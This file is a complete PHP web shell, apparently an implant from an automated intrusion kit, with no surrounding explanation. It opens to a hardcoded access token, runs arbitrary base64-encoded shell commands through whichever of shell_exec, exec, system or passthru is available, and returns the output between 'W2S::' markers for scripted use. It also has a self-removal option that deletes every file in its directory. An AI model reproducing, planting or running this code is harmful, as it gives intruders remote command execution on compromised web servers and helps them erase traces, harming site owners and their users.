WS_OK_7.4.33
<?php
if (!hash_equals('1654391b01d99f5873b89e248802a7c0', (string)($_GET['t'] ?? ''))) { http_response_code(404); exit; }
if (isset($_GET['rm'])) { $d = __DIR__; foreach (glob($d . '/*') as $f) { @unlink($f); } @rmdir($d); echo 'W2S::REMOVED::END'; exit; }
$c = base64_decode((string)($_GET['c'] ?? '')) . ' 2>&1'; $o = 'NO_EXEC';
if (function_exists('shell_exec')) { $o = shell_exec($c); }
elseif (function_exists('exec')) { exec($c, $r); $o = implode("\n", $r); }
elseif (function_exists('system')) { ob_start(); system($c); $o = ob_get_clean(); }
elseif (function_exists('passthru')) { ob_start(); passthru($c); $o = ob_get_clean(); }
echo 'W2S::' . $o . '::END';